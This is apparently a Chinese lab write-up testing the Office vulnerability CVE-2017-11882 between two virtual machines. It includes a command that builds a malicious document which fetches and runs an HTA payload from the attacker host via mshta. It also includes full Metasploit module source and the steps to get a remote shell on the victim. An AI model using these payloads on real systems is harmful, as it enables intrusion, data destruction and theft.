Office隱藏17年的漏洞CVE_2017_11882測試記錄

創建時間：	2017/11/25 0:18
作者：	CN_Simo
標簽：	Office漏洞

 

參考文章1：https://www.cnblogs.com/Oran9e/p/7880832.html

參考文章2：https://www.cnblogs.com/i-honey/p/7885573.html

 

POC地址：https://github.com/Ridter/CVE-2017-11882/

 

中間環節出現，msf連接數據庫失敗的情況，解決方法： https://www.cnblogs.com/justforfun12/p/5205804.html

 

1.制造條件

 

 

這里搭建兩台虛擬機進行測試！

 

測試機配置信息：

 

操作系統	Win7_x64 企業版
Office版本	Office 2013
防火牆狀態	開啟
IP	192.168.1.103
系統語言	Chinese

 

 

操作系統	Kali 2.1 中文
IP	192.168.1.104

 

首先在kali下安裝nginx，或者tomcat應該也是可以的，首先將生成的doc文件放在/usr/share/nginx/html目錄下，方便被攻擊的機器獲取doc文件。

 

啟動nginx服務：systemctl start nginx

 

使用 Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.104:8080/abc" ;; -o cev2.doc

# 將下載好的漏洞模塊放在msf任意目錄下

root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的內容如下：

##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule  < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})

    super(update_info(info,

      'Name' => 'Microsoft Office Payload Delivery',

      'Description' => %q{

        This module generates an command to place within

        a word document, that when executed, will retrieve a HTA payload

        via HTTP from an web server. Currently have not figured out how

        to generate a doc.

      },

      'License' => MSF_LICENSE,

      'Arch' => ARCH_X86,

      'Platform' => 'win',

      'Targets' =>

        [

          ['Automatic', {} ],

        ],

      'DefaultTarget' => 0,

    ))

  end

  def on_request_uri(cli, _request)

    print_status("Delivering payload")

    p = regenerate_payload(cli)

    data = Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      'win',

      p.encoded,

      'hta-psh',

      { :arch => ARCH_X86, :platform => 'win '}

    )

    send_response(cli, data, 'Content-Type' => 'application/hta')

  end

  def primer

    url = get_uri

    print_status("Place the following DDE in an MS document:")

    print_line("mshta.exe \"#{url}\"")

  end

 

然后，這里在使用msfconsole之前，需要先打開數據庫，例如  service postgresql start 

打開數據庫之后，進入msfconsole，然后對msf進行初始化，執行msf init

之后search cve_2017_11882搜索漏洞模塊，然后按照【參考文章2】進行配置，最后 exploit 之后啟動對 8080 端口的監聽，至於為什么是8080端口我也不太清楚啊！

 

2.萬事俱備，只欠東風

 

這個時候，只需要在 win7 上通過瀏覽器的到 cve2.doc文檔，打開之后，kali中命令行立刻顯示已經獲取到了連接，

session命令得到回話，session -i 【id】建立連接

shell命令可以得到cmd，執行net user查看用戶

 

3.實驗效果

 

通過這個漏洞，可以肆無忌憚的執行一些命令，例如關機，刪除一些文件，收集一些系統信息還是非常有用的

在桌面新建文件夾

遠程關機

雖然獲取到了命令行，但是通過net user命令可以看到登錄的用戶級別是Guest，這就限制了一些需要權限較高的命令執行！

而且這里win7沒有安裝殺軟，我不知道安裝殺軟之后word文檔會不會被查殺呢？